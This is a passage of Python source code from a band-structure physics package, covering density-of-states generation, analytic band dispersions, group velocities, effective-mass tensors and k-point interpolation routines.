enough detail to calculate " "the valence band maximum, conduction band " "minimum and band gap? Exiting.") sys.exit(1) if self.param.scissor: if self.metallic: logger.error("User requests to apply scissor operator to a " "metallic system. Exiting.") logger.info("Applying scissor operator and lifting the conduction " "bands") energies[self. cbm_band:] = energies[self.cbm_band:] + self.param.scissor def check_dos_energy_range(self, remin, remax): """ Check that the energy grid of the density of states covers the range of the supplied paramters. Parameters ---------- remin : float The energy in eV for the lowest requested energy. remax : float The energy in eV for the highest requested energy. Returns ------- within : boolean True if the endpoints are within the energy range of the stored density of states, False ortherwise. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running check_dos_energy_range.") within = True # dos exists? try: self.dos_energies except AttributeError: return False if self.dos_energies is None: return False if remin < self.dos_energies[0]: logger.info("The lower limit on the energy of the sampled " "density of states is not 'transport_energycutband' " "away from the minimum of the requested chemical " "potential.") within = False if remax < self.dos_energies[self.dos_energies.shape[0] - 1]: logger.info("The high limit on the energy of the sampled " "density of states is not 'transport_energycutband' " "away from the maximum of the requested chemical " "potential.") within = False return within def check_energyshifts(self): """ Check the energy shift parameters in the parameter file for consistency. Parameters ---------- None Returns ------- None """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running apply_scissor_operator.") if (self.param.e_fermi_in_gap and # pylint: disable=too-many-boolean-expressions self.param.e_fermi and self.param.e_vbm) or \ (self.param.e_fermi_in_gap and self.param.e_fermi) or \ (self.param.e_fermi_in_gap and self.param.e_vbm) or \ (self.param.e_fermi and self.param.e_vbm): logger.error("User have sett more than one energy shift " "parameter. Exiting.") sys.exit(1) def check_velocities(self, cutoff=None): """ Check that there exists realistic values for the band velocities. Parameters ---------- cutoff : float, optional Cutoff value for the test in eVAA units. Defaults to 0.01. Returns ------- boolean True if values are above `cutoff`, False otherwise. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running check_velocities.") if cutoff is None: cutoff = 0.01 if (np.abs(self.velocities) < cutoff).all(): logger.info("All band velocities are less than %s. Continuing.", str(cutoff)) return False return True def locate_band_gap(self): """ Calculate the band gap. Parameters ---------- None Returns ------- float The band gap in eV """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running locate_band_gap.") # loop bands band_gap = np.inf if self.bandparams.shape[0] < 2: logger.info("Requesting band gap for one band system. Setting " "band gap to infinity and Fermi level to zero.") band_gap = np.inf for band in range(self.bandparams.shape[0]): # locate minimum value in all bands conduction = self.energies[band][np.where( self.energies[band] > constants.zerocut)] if conduction.shape[0] > 0: band_min = np.amin(self.energies[band][np.where( self.energies[band] > constants.zerocut)]) if band_min < band_gap: band_gap = band_min return band_gap def gen_dos(self): """ Generates the density of states for the analytic models Parameters ---------- None Returns ------- dos : ndarray | Dimension: (N, M) Contains the density of states for N bands at M `dos_num_samples` from `dos_e_min` to `dos_e_max`. The number of samplings and their range is set it general configuration file. Units are per volume unit, 1/eV/AA^3. dos_energies : ndarray | Dimension: (M) Contains the energy samplings of which `dos` was calculated in units of eV. Notes ----- Currently only the parabolic models are implemented. .. todo:: Also implement the non-parabolic alpha models """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running gen_dos.") # check if we have any bands which are not parabolic, if # so do not calculate the analytical dos if np.any(self.bandparams[:][0]) != 0: return None, None # also check for any non parabolic character in the band # generation (alpha or k^4). Currently no analytic # expression is implemented to set these directly. # However, these do exist, so consider to add them in the # future. if np.any(self.bandparams[:, 1]) == 1 or \ np.any(self.bandparams[:, 1]) == 2: return None, None dos_units = 0.1 * np.power(constants.elmass * constants.jtoev, 1.5) / \ (np.sqrt(20) * np.power(constants.pi, 2.0) * np.power(constants.hbar, 3.0)) numbands = self.effmass.shape[0] e0 = self.e0 effmass = np.zeros(numbands) # use e_max for the dos limit dos_energies = np.linspace(self.param.dos_e_min, self.param.dos_e_max, self.param.dos_num_samples) dos = np.zeros((numbands, self.param.dos_num_samples)) # some tests for band in range(numbands): # use density of states effective mass effmass[band] = np.power(np.prod(np.abs(self.effmass[band])), 1.0 / 3.0) energy_shift = dos_energies - e0[band] status = self.status[band] # conduction if status == "c": dos_entries = np.where(dos_energies - e0[band] > 0) dos[band, dos_entries] = dos[band, dos_entries] + \ self.spin_degen[band] * \ np.power(effmass[band], 1.5) * \ np.sqrt(energy_shift[dos_entries]) # valence if status == "v": dos_entries = np.where(dos_energies - e0[band] < 0) dos[band, dos_entries] = dos[band, dos_entries] + \ self.spin_degen[band] * \ np.power(effmass[band], 1.5) * \ np.sqrt(np.abs(energy_shift[dos_entries])) # slam on the dos units dos = dos * dos_units return dos, dos_energies def gen_bands(self): r""" Generates the set of energy and velocity dispersions. Parameters ---------- None Returns ------- energies : ndarray | Dimension: (N,M) Contains the energy dispersions in eV for N bands at M k-points. velocities : ndarray | Dimension: (N,M,3) Contains the group velocities in eVAA of the energy dispersions (without the :math:`\\hbar^{-1}` factor). tb_band : ndarray | Dimension: (N) Contains boolean values of True for band indexes that are tight binding bands, False otherwise. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running gen_bands.") # check if vasp is read, if so, only return if self.param.read == "vasp": return None, None, None numbands = self.bandparams.shape[0] numkpoints = self.lattice.kmesh.shape[0] energies = np.zeros((numbands, numkpoints)) velocities = np.zeros((numbands, 3, numkpoints)) tb_band = [] band = 0 while band < numbands: # do everything but tight binding if self.bandparams[band][0] != 3: e, v = self.gen_analytic_band(band) energies[band] = e velocities[band] = v tb_band.append(False) band = band + 1 else: logger.error("The supplied band type of: %s is not supported", str(self.bandparams[band][0])) sys.exit(1) energies = np.array(energies, dtype="double") velocities = np.array(velocities, dtype="double") # check Fermi level if self.param.e_fermi_in_gap: # place Fermi level in the middle of the gap (if it exists, # otherwise set to zero) band_gap = self.locate_band_gap() if band_gap != np.inf: self.param.e_fermi = self.locate_band_gap() / 2.0 else: logger.info("User wanted to place Fermi level in the middle " "of the gap, but no gap was found. Setting Fermi " "level to 0.0 eV. Continuing.") self.param.e_fermi = 0.0 # return data return energies, velocities, tb_band def gen_analytic_band(self, band): # pylint: disable=too-many-locals r""" Generate an analytical energy and velocity dispersion. Parameters ---------- band : int The band index used to fetch band parameters in bandparams.yml. Returns ------- energy : ndarray | Dimension: (M) The energy dispersion in eV at M k-points. velocity : ndarray | Dimension: (M,3) The group velocity in eVAA of the energy dispersion (without the :math:`\\hbar^{-1}` factor). """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running gen_analytick_band.") # set generator functions band_function = self.bandparams[band][0] # set a to zero for parabolic bands if band_function == 0: logger.info("Setting the 'a' and 'ascale' factor to zero." "Continuing.") self.a[band] = [0.0, 0.0, 0.0] self.ascale[band] = 0.0 generate_energy = non_parabolic_energy_1 generate_velocity = non_parabolic_velocity_1 else: if band_function == 1: generate_energy = non_parabolic_energy_1 generate_velocity = non_parabolic_velocity_1 elif band_function == 2: generate_energy = non_parabolic_energy_2 generate_velocity = non_parabolic_velocity_2 elif band_function == 5: generate_energy = non_parabolic_energy_3 generate_velocity = non_parabolic_velocity_3 elif band_function == 6: generate_energy = non_parabolic_energy_4 generate_velocity = non_parabolic_velocity_4 elif band_function == 7: generate_energy = non_parabolic_energy_5 generate_velocity = non_parabolic_velocity_5 elif band_function > 7: logger.error( "Supplied non_parabolic_function = %s does not exist." "Exiting.", str(band_function)) sys.exit(1) # fetch k-point grid in cartersian k = self.lattice.fetch_kmesh(direct=False) if not band_function == 4: # first energy energy = generate_energy(k, self.effmass[band], self.a[band], self.ascale[band], e0=self.e0[band], kshift=self.kshift[band]) # then velocity vx, vy, vz = generate_velocity(k, self.effmass[band], self.a[band], self.ascale[band], kshift=self.kshift[band]) ################################################## ################################################## # USE THIS SECTION TO MAKE CUSTIMIZED BANDS AND # # SET THE BAND TYPE TO 4 (NOT DOCUMENTED) # ################################################## ################################################## # CUSTOM SECTION START # ################################################## else: quartic_onset = False if quartic_onset: # quartic band behavior at the onset # first fetch quartic energy_q = non_parabolic_energy_1(k, self.effmass[band], self.a[band], self.ascale[band], e0=self.e0[band], kshift=self.kshift[band]) # then velocity vx_q, vy_q, vz_q = non_parabolic_velocity_1( k, self.effmass[band], self.a[band], self.ascale[band], kshift=self.kshift[band]) # then parabolic self.a[band] = [0.0, 0.0, 0.0] self.effmass[band] = -2.0 self.e0[band] = 0.0 energy_p = non_parabolic_energy_1(k, self.effmass[band], self.a[band], self.ascale[band], e0=self.e0[band], kshift=self.kshift[band]) vx_p, vy_p, vz_p = non_parabolic_velocity_1( k, self.effmass[band], self.a[band], self.ascale[band], kshift=self.kshift[band]) # given the input # A = -20 # eshift of -0.047195 eV # quartic effective mass of 100 and parabolic mass of 2.0 # calculate length of k-vectors k_length = np.linalg.norm(k, axis=1) quartic_portion = np.where(k_length < 0.220479) energy_p[quartic_portion] = energy_q[quartic_portion] vx_p[quartic_portion] = vx_q[quartic_portion] vy_p[quartic_portion] = vy_q[quartic_portion] vz_p[quartic_portion] = vz_q[quartic_portion] # shift back energy = energy_p + 0.047195 else: # quartic band behavior deep in band, parabolic onset # quartic band behavior at the onset # first fetch quartic energy_q = non_parabolic_energy_1(k, self.effmass[band], self.a[band], self.ascale[band], e0=self.e0[band], kshift=self.kshift[band]) # then velocity vx_q, vy_q, vz_q = non_parabolic_velocity_1( k, self.effmass[band], self.a[band], self.ascale[band], kshift=self.kshift[band]) # then parabolic self.a[band] = [0.0, 0.0, 0.0] self.effmass[band] = -2.0 self.e0[band] = 0.0 energy_p = non_parabolic_energy_1(k, self.effmass[band], self.a[band], self.ascale[band], e0=self.e0[band], kshift=self.kshift[band]) vx_p, vy_p, vz_p = non_parabolic_velocity_1( k, self.effmass[band], self.a[band], self.ascale[band], kshift=self.kshift[band]) # given the input # A = -20 # eshift of -0.047195 eV # quartic effective mass of 100 and parabolic mass of 2.0 # calculate length of k-vectors k_length = np.linalg.norm(k, axis=1) quartic_portion = np.where(k_length > 0.220479) energy_p[quartic_portion] = energy_q[quartic_portion] vx_p[quartic_portion] = vx_q[quartic_portion] vy_p[quartic_portion] = vy_q[quartic_portion] vz_p[quartic_portion] = vz_q[quartic_portion] # shift back energy = energy_p vx = vx_p vy = vy_p vz = vz_p ################################################## # CUSTOM SECTION END # ################################################## # THIS DOES NOT WORK FOR MULTIBAND SCENARIOS, KILL IT # ACTUALLY, THIS FOLDING NEEDS TO BE FIXED IN ORDER TO GET THE # BAND INDEX FIRST DISABLE UNTIL FIXED! if self.bandparams[band][1] != 0: logger.error("Band folding does not currently work due to band " "ordering. Exiting.") sys.exit(1) velocity = vx, vy, vz return np.array(energy), np.array(velocity) def fetch_velocities_along_line(self, kstart, kend, itype=None, itype_sub=None): r""" Calculate the velocity dispersion along a line in reciprocal space. Parameters ---------- kstart : ndarray, optional | Dimension: (3) The start k - point in cartesian coordinates. kend : ndarray | Dimension: (3) The end k - point in cartesian coordinates. itype : string, optional | Can be any of: | {"linearnd", "interpn", "rbf", "wildmagic", "skw"} The type of interpolate method to use. If not set, the parameter `dispersion_interpolate_method` in the general configuration file sets this. itype_sub : string, optional | Can be any of: | {"nearest", "linear"}, when `itype` is set to `interpn`. | {"multiquadric", "inverse_multiquadric", "gaussian", "linear", | "cubic", "quintic", "thin_plate"}, when `itype` is set to `rbf` | and when the Scipy variety is used. | {"trilinear, tricubic_exact, tricubic_bspline, akima"}, | when `itype` is set to `wildmagic`. The subtype of the interpolation method. Returns ------- velocities : ndarray | Dimension: (N, 3, M) The group velocity in units of eVAA along a line for N bands and M k - points, defined by the `num_kpoints_along_line` in the general configuration file. kpts : ndarray | Dimension: (M, 3) The kpoints where the group velocity was calculated. Notes ----- The :func:`interpolate` is used to perform the interpolation of the data along the line. .. warning:: The factor :math:`\\hbar^{-1}` is not returned and need to be included externally. See Also -------- interpolate """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.info("Running fetch_velocities_along_line.") # now make sure the supplied points does not extend outside the # grid bz_border = self.lattice.fetch_bz_border(direct=True) utils.pull_vecs_inside_boundary((kstart, kend), bz_border, constants.zerocut) kpts = self.lattice.fetch_kpoints_along_line( kstart, kend, self.param.dispersion_num_kpoints_along_line, direct=False) velocities = self.fetch_velocities_at_kpoints(kpts, itype=itype, itype_sub=itype_sub) return velocities, kpts def fetch_velocities_at_kpoints(self, kpoint_mesh, itype=None, itype_sub=None): r""" Calculate the velocity dispersions at specific k - points. Parameters ---------- kpoint_mesh : ndarray | Dimension: (N, 3) The k - point mesh for extraction in cartesian coordinates. itype : string, optional | Can be any of: | {"linearnd", "interpn", "rbf", "wildmagic", "skw"} The type of interpolate method to use. If not set, the parameter `dispersion_interpolate_method` in the general configuration file sets this. itype_sub : string, optional | Can be any of: | {"nearest", "linear"}, when `itype` is set to `interpn`. | {"multiquadric", "inverse_multiquadric", "gaussian", "linear", | "cubic", "quintic", "thin_plate"}, when `itype` is set to `rbf` | and when the Scipy variety is used. | {"trilinear, tricubic_exact, tricubic_bspline, akima"}, | when `itype` is set to `wildmagic`. The subtype of the interpolation method. Returns ------- velocities : ndarray | Dimension: (N, 3, M) The group velocity in units of eVAA at the N bands for M k - points. Notes ----- The :func:`interpolate` is used to perform the interpolation. .. warning:: The factor :math:`\\hbar^{-1}` is not returned and need to be included externally. See Also -------- interpolate """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running fetch_velocities_at_kpoints.") dummy, velocities, dummy = self.interpolate(kpoint_mesh=kpoint_mesh, itype=itype, itype_sub=itype_sub, ivelocities=True) return velocities def fetch_energies_along_line(self, kstart, kend, samplings=None, itype=None, itype_sub=None): """ Calculate the energy dispersions along specific k - points. Parameters ---------- kstart : ndarray | Dimension: (3) Direct k - point coordinate of the start point of line extraction. kend : ndarray | Dimension: (3) Direct k - point coordinate of the end point of line extraction. samplings : int, optional The number of N samples along the line. If not specified the variable is set to the the `num_kpoints_along_line` parameter in params.yml itype : string, optional | Can be any of: | {"linearnd", "interpn", "rbf", "wildmagic", "skw"} The type of interpolate method to use. If not set, the parameter `dispersion_interpolate_method` in the general configuration file sets this. itype_sub : string, optional | Can be any of: | {"nearest", "linear"}, when `itype` is set to `interpn`. | {"multiquadric", "inverse_multiquadric", "gaussian", "linear", | "cubic", "quintic", "thin_plate"}, when `itype` is set to `rbf` | and when the Scipy variety is used. | {"trilinear, tricubic_exact, tricubic_bspline, akima"}, | when `itype` is set to `wildmagic`. The subtype of the interpolation method. Returns ------- energies : ndarray | Dimension: (N, M) The energy dispersions in eV along a line for N bands and M k - points, defined by the `num_kpoints_along_line` in the general configuration file. kpts : ndarray | Dimension: (N, 3) The k - point mesh for the line extraction in cartesian coordinates. Notes ----- The routine :func:`interpolate` is used to perform the interpolation of the data along the line. See Also -------- interpolate """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.info("Running fetch_energies_along_line.") # now make sure the supplied points does not extend outside the # grid bz_border = self.lattice.fetch_bz_border(direct=True) utils.pull_vecs_inside_boundary((kstart, kend), bz_border, constants.zerocut) if samplings is None: samplings = self.param.dispersion_num_kpoints_along_line kpts = self.lattice.fetch_kpoints_along_line(kstart, kend, samplings, direct=False) energies = self.fetch_energies_at_kpoints(kpoint_mesh=kpts, itype=itype, itype_sub=itype_sub) return energies, kpts def fetch_energies_at_kpoints(self, kpoint_mesh, itype=None, itype_sub=None): """ Calculate the energy dispersions at specific k - points by interpolation. Parameters ---------- kpoint_mesh : ndarray | Dimension: (N, 3) The N k - point coordinates in cartesian coordinates. itype : string, optional | Can be any of: | {"linearnd", "interpn", "rbf", "wildmagic", "skw"} The type of interpolate method to use. If not set, the parameter `dispersion_interpolate_method` in the general configuration file sets this. itype_sub : string, optional | Can be any of: | {"nearest", "linear"}, when `itype` is set to `interpn`. | {"multiquadric", "inverse_multiquadric", "gaussian", "linear", | "cubic", "quintic", "thin_plate"}, when `itype` is set to `rbf` | and when the Scipy variety is used. | {"trilinear, tricubic_exact, tricubic_bspline, akima"}, | when `itype` is set to `wildmagic`. The subtype of the interpolation method. Returns ------- energies : ndarray | Dimension: (N, M) The energies in eV for each of the N bands and M k - points. Notes ----- The routine :func:`interpolate` is used to perform the interpolation. See Also -------- interpolate """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running fetch_energies_at_kpoints.") # fetch points energies, dummy, dummy = self.interpolate(kpoint_mesh=kpoint_mesh, itype=itype, itype_sub=itype_sub) return energies def calc_effective_mass(self): """ Calculates the effective mass tensor. Currently the effective mass tensor is not diagonalized. Parameters ---------- None Returns ------- None Notes ----- Upon complettion the effective mass is stored in the current `Bandstructure()` object. Also, the velocities have to be precalculated before calling this routine. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running calc_effective_mass.") # check if the velocities exists if self.gen_velocities: logger.error("Please generate the velocities before " "calling the calc_effective_mass routine. " "Exiting.") sys.exit(1) # check that there is sensible values stored in the # velocities if not self.check_velocities(): logger.error("The velocity data does not seem to be " "realistic. Very small values are detected. " "Exiting. ") sys.exit(1) # define tensor num_bands = self.energies.shape[0] num_kpoints = self.energies.shape[1] inv_mass = np.zeros((num_bands, 3, 3, num_kpoints)) # if we need to interpolate # let us make sure the interpolation sampling is # the same as the input if not self.param.dispersion_velocities_numdiff: ksampling_inter = np.copy( self.param.dispersion_interpolate_sampling) self.param.dispersion_interpolate_sampling = \ self.lattice.ksampling # here we could use inline and rely on broadcasting, # but do it simple now # we also calculate to many elements due to its symmetric # nature but again it is simple for d in range(3): if self.param.dispersion_velocities_numdiff: # velocities was obtained with numerical difference, # use same procedure for the effective mass inv_mass[:, :, d, :] = self.calc_velocities( self.velocities[:, d, :]) else: # here we have to get velocities by interpolation dummy, inv_mass[:, :, d, :], dummy = \ self.interpolate(ienergies=True, ivelocities=True, store_inter=False, energies=self.velocities[:, d, :]) # reset ksampling_inter if not self.param.dispersion_velocities_numdiff: self.param.dispersion_interpolate_sampling = \ ksampling_inter # store effective mass (effmass already exists from the # readin from bandparam.yml) in units of the free electron mass effmass_tensor = 100 * np.power(constants.hbarsqcsq, 2.0) * \ np.linalg.inv(inv_mass) / constants.elmasscsq if self.param.dispersion_effmass_diagonalize: # diagonalize? w, v = np.linalg.eig(effmass_tensor) self.effmass_eigenval = w self.effmass_eigenvec = v elif self.param.dispersion_effmass_transform: # transform? trans = np.array(self.param.dispersion_effmass_transform).T self.effmass_tensor = np.matmul(effmass_tensor, trans) else: # just store the tensor self.effmass_tensor = effmass_tensor def calc_velocities(self, velocities=None, store=True): """ Calculate the electron group velocities from the electron energy dispersion Parameters ---------- velocities : ndarray, optional | Dimension: (N, M) Contains the group velocity along a specific direction for N bands and M k-points. If supplied the velocities of the velocities are calculated, or more specifically the inverse effective mass tensor (without prefactor) store : boolean, optional If True, store the calculated velocities in the active `Bandstructure()` object, else return the velocity array. Defaults to True. Returns ------- velocities : ndarray, optional | Dimension: (N, 3, M) The velocities of the velocity. Only returned if `store` is set to False. Notes ----- Does not call any interpolation routines such that the velocities can be extracted directly from the electron energy dispersion by numerical differentiation. Uses the :func:`gradient` from NumPy. Overwrites any entry of exising `velocities` in `bs` and sets `gen_velocities` to False if `velocities` is not supplied. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running calc_velocities.") if velocities is None: # if velocities is not supplied use the energies and # calculate the velocities e_or_v = self.energies else: # if velocities is supplied calculate the velocities # of the supplied velocity e_or_v = velocities ksampling = self.lattice.ksampling num_kpoints = e_or_v.shape[1] num_bands = e_or_v.shape[0] # assume equally spaced grid and fetch # spacing along each direction dx, dy, dz = self.lattice.fetch_kmesh_step_size(direct=False) # fetch velocities # reshape e_or_v_shaped = np.reshape( e_or_v, (num_bands, ksampling[0], ksampling[1], ksampling[2]), order='C') # call gradient from NumPy to obtain the gradients and # pass spacings (grid is seldom cubic with spacing of 1.0) # also, make sure we do nothing to the band axis vx, vy, vz = np.gradient(e_or_v_shaped, dx, dy, dz, axis=(1, 2, 3)) # flatten and store velocities = np.array([ np.reshape(vx, (num_bands, num_kpoints), order='C'), np.reshape(vy, (num_bands, num_kpoints), order='C'), np.reshape(vz, (num_bands, num_kpoints), order='C') ]) # need band first, then direction, then k-points velocities = np.swapaxes(velocities, 0, 1) if store: # store the calculated velocities # no need to generate velocities again self.gen_velocities = False # set velocities in current object self.velocities = velocities return None # return the velocities of the velocities # for a specific direction return velocities def interpolate( # pylint: disable=too-many-locals # noqa: MC0001 self, iksampling=None, ienergies=True, ivelocities=False, itype=None, itype_sub=None, kpoint_mesh=None, store_inter=False, energies=None): """ Interpolates the energies and velocity dispersion. Parameters ---------- iksampling : ndarray, optional | Dimension: (3) Contains the interpolated k - point mesh sampling values. Does not have to be set if line extraction performed (full grid is instead supplied in line_mesh). ienergies : boolean If True, interpolate the energies, if not, do not. ivelocities : boolean If True, interpolate the velocities, if not, do not itype : string, optional Can be any of: {"linearnd", "interpn", "rbf", "wildmagic", "skw"} The type of interpolate method to use. If not set, the parameter `dispersion_interpolate_method` in the general configuration file sets this. itype_sub : string, optional | Can be any of: | {"nearest", "linear"}, when `itype` is set to `interpn`. | {"multiquadric", "inverse_multiquadric", "gaussian", "linear", | "cubic", "quintic", "thin_plate"}, when `itype` is set to `rbf` | and when the Scipy variety is used. | {"trilinear, tricubic_exact, tricubic_bspline, akima"}, | when `itype` is set to `wildmagic`. The subtype of the interpolation method. kpoint_mesh : ndarray, optional | Dimension: (M, 3) Supplied k - point grid for extraction as an alternative to iksampling. Should be supplied in cartesian coordinates and should not extend the border of the original grid. Usefull for line extraction etc. store_inter : boolean, optional Store the new interpolated energies and velocities in the supplied object. Also modifies the current `Lattice()` object with the new grid etc. if that has been modified. Defaults to False. energies : ndarray, optional | Dimension: (N,J) An input array containing the energies (or some other) quantity that can fly through with the same structure, e.g. the velocities along a certain direction for N bands and J k-points. Returns ------- ien, ivel : ndarray, ndarray | Dimension: (N,M), (N,3,M) The energy dispersions in eV, and group velocities in eVAA along indexes each axis of the reciprocal basis are returned for N bands and M new k - points if velocities is supplied, or if the `gen_velocities` tag is set to True in the current `Bandstructure()` object. ien, False, False, False : ndarray, boolean, boolean, boolean | Dimension: (N,M) The energy dispersions in eV for N bands and M new k-points if `velocities` is not supplied or `gen_velocities` is set to False. Notes ----- .. todo:: DOCUMENT THE DIFFERENT INTERPOLATION SCHEMES, OR AT LEAST ADD PROPER REFERENCES. See Also -------- linearnd interpn rbf """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running interpolate.") # this flag determines if we want to run the # Wildmagic interpolation on direct or # cartesian coordinates (does not matter for the energies) # this should always be set to False, except for testing wildmagic_direct = False if ienergies: if energies is None: try: energies = self.energies except AttributeError: logger.error("The energies is not stored in the current " "Bandstructure() object. Exiting.") sys.exit(1) if ivelocities: try: velocities = self.velocities except AttributeError: logger.error( "The band velocities is not stored in the current " "Bandstructure() object. Exiting.") sys.exit(1) if iksampling is None: iksampling = self.lattice.fetch_iksampling() # check if iksampling is sensible check_sensible_ksampling(iksampling) # set interpolate method from param file, if not supplied # also demand that is itype or itype_sub is supplied, the other # also has to be supplied needs_sub = {"interpn", "rbf", "wildmagic"} if (itype is None) and (itype_sub is None): itype = self.param.dispersion_interpolate_method itype_sub = self.param.dispersion_interpolate_type else: if itype in needs_sub and itype_sub is None: logger.error("If supplying itype, also supply the relevant " "itype_sub flag and vice versa. Exiting.") sys.exit(1) if itype is None: logger.error("The itype parameter is not given upon calling " "the interpolation routine. Exiting.") sys.exit(1) # now check for valid itype, itype_sub is done later possible_itypes = {"linearnd", "interpn", "rbf", "wildmagic", "skw"} if itype not in possible_itypes: logger.error( "The specified itype (or dispersion_interpolate_method " "in the general configuraiton file) is not recognized. " "Exiting.") sys.exit(1) gen_velocities = self.gen_velocities if gen_velocities and ivelocities: if itype not in ("wildmagic", "skw"): logger.error("Gradient extraction for the band " "velocities are only supported for the " "wildmagic_akima/" "wildmagic_tricubic_bspline/" "wildmagic_tricubic_exact/" "wildmagic_trilinear/" "skw interpolation method. " "Please change and rerun. Exiting.") sys.exit(1) # set ksampling ksampling = self.lattice.ksampling # for these intepolation routines, it is best to work on the # full BZ for the moment num_kpoints_energy = self.energies.shape[1] if num_kpoints_energy != self.lattice.kmesh.shape[0]: if num_kpoints_energy == self.lattice.kmesh_ired.shape[0]: # SKW need IBZ grid, so this is fine if itype != "skw": logger.debug( "Irreducible data detected in interpolation " "routine. Laying out the full BZ before continuing " "with the interpolation routines") energies = energies[:, self.lattice.mapping_bz_to_ibz] velocities = velocities[:, :, self.lattice. mapping_bz_to_ibz] else: logger.error( "The number of k-points for the energies does not " "match the full BZ or the IBZ grid. Exiting.") sys.exit(1) else: # if SKW, we need to reduce the grid to the IBZ if itype == "skw": energies = energies[:, self.lattice.mapping_ibz_to_bz] # check that gamma_center mode is enabled: if not self.param.gamma_center: logger.error( "The automatic interpolation routines only work if " "gamma_center is set to True. Either turn of interpolation " "or switch to gamma_center. Exiting.") sys.exit(1) # fetch old grid in cartesian (IBZ in direct for SKW) if itype in ("skw", "wildmagic"): if itype == "skw": old_grid = self.lattice.fetch_kmesh(direct=True, ired=True) else: # store old bz border to be used in the interpolation # routines below if wildmagic_direct: old_grid = self.lattice.fetch_kmesh(direct=True) old_bz_border = self.lattice.fetch_bz_border(direct=True) else: old_grid = self.lattice.fetch_kmesh(direct=False) old_bz_border = self.lattice.fetch_bz_border(direct=False) else: old_grid = self.lattice.fetch_kmesh(direct=False) old_bz_border = self.lattice.fetch_bz_border(direct=False) ksampling_old = ksampling # set new grid, special case for SKW, then the grid is created in the # SKW routine (Fourier transformation, so no need to create a new one) # also, we need to make sure the interpolator grid does not go out of # bounds as most methods cannot handle extrapolation (by increasing # their grid point sampling one extends towards BZ edge and thus need to # extrapolate) # one easy way to do this is to modify the basis such that it goes from # +/- the original grids endpoints (as these seldom fall at the BZ edge). # # calculate correction vector used to rescale the reciprocal unitcell # and obtain a new real unitcell that is passed to spglib for grid # generation, in this way the endpoints of the original point is # included # WE ONLY DO THIS IF kpoint_mesh IS None if kpoint_mesh is None: lattice_old = copy.deepcopy(self.lattice) # sets if we should use the old scaling factor (problems with # even grids), the new approach is tested and should allow # to use even and odd grids old_scaling_factor = False if itype != "skw": logger.info("The kpoint mesh have been adjusted in the " "interpolation routines and sqeezed into the " "original bz zone to avoid extrapolation issues. " "Be carefull when modifying this grid in the " "future.") if old_scaling_factor: # calculate scaling factor # need to make sure that all min/max points along each # direction of the direct grid is within the original, # the scaling factor is the largest factor returned from # this scaling direct_width_bz_old = (ksampling - 1) / \ (ksampling.astype(dtype="double")) direct_width_bz_new = (iksampling - 1) / \ (iksampling.astype(dtype="double")) dvec = direct_width_bz_old / direct_width_bz_new else: kmin_old = np.zeros(3) kmax_old = np.zeros(3) kmesh = self.lattice.fetch_kmesh(direct=True) # store the min and max for each direction of the old # grid for i in range(3): kmin_old[i] = np.amin(kmesh[:, i]) kmax_old[i] = np.amax(kmesh[:, i]) # call spglib to generate grid self.lattice.create_kmesh(iksampling, borderless=True) if not old_scaling_factor: ratio = np.zeros(6) kmesh = self.lattice.fetch_kmesh(direct=True) # if the new grid extens outside # the previously calculated min and max values # calculate the ration, the biggest of which # will scale the whole grid so that it is inside their # original boundry for i in range(3): ratio[i] = np.amin(kmesh[:, i]) / kmin_old[i] ratio[i + 3] = np.amax(kmesh[:, i]) / kmax_old[i] # no ratios should be negative if np.any(ratio) < 0: logger.error("The ratio of the minimum and " "maximum between the old and new " "k-point grid is negative. Please " "check your grids. Exiting.") sys.exit(1) # find largest and set scaling dvec = 1.0 / np.amax(ratio) # now this is the crucial part, scale the grid by # dvec to pull it inside the borders dvec = (1 - 1e-6) * dvec self.lattice.kmesh = self.lattice.kmesh * dvec # sometimes the IBZ grid does not exist if self.lattice.kmesh_ired is not None: self.lattice.kmesh_ired = self.lattice.kmesh_ired * dvec # use direct for Wildmagic, cartesian # for the rest if itype == "wildmagic": if wildmagic_direct: new_grid = self.lattice.fetch_kmesh(direct=True) else: new_grid = self.lattice.fetch_kmesh(direct=False) else: new_grid = self.lattice.fetch_kmesh(direct=False) else: new_grid = old_grid else: new_grid = kpoint_mesh num_new_kpoints = new_grid.shape[0] num_bands = energies.shape[0] ien = np.zeros((num_bands, num_new_kpoints), dtype=np.double) if gen_velocities or ivelocities: ivel1 = np.zeros((num_bands, num_new_kpoints), dtype=np.double) ivel2 = np.zeros((num_bands, num_new_kpoints), dtype=np.double) ivel3 = np.zeros((num_bands, num_new_kpoints), dtype=np.double) # loop bands for python stuff, otherwise do loop of bands inside C # routines if itype in ("linearnd", "interpn", "rbf"): # pylint: disable=too-many-nested-blocks for band in range(num_bands): ien_band = None ivel1_band = None ivel2_band = None ivel3_band = None if itype == "linearnd": logger.info( "Interpolating using Scipy LinearNDInterpolator.") intere = scipy.interpolate.LinearNDInterpolator( old_grid, energies[band]) ien_band = intere(new_grid) if ivelocities: intervel1 = scipy.interpolate.LinearNDInterpolator( old_grid, velocities[band][0]) intervel2 = scipy.interpolate.LinearNDInterpolator( old_grid, velocities[band][1]) intervel3 = scipy.interpolate.LinearNDInterpolator( old_grid, velocities[band][2]) ivel1_band = intervel1(new_grid) ivel2_band = intervel2(new_grid) ivel3_band = intervel3(new_grid) if itype == "interpn": logger.info("Interpolating using Scipy interpn.") old_grid_unit_vecs = self.lattice.fetch_kmesh_unit_vecs( direct=False) 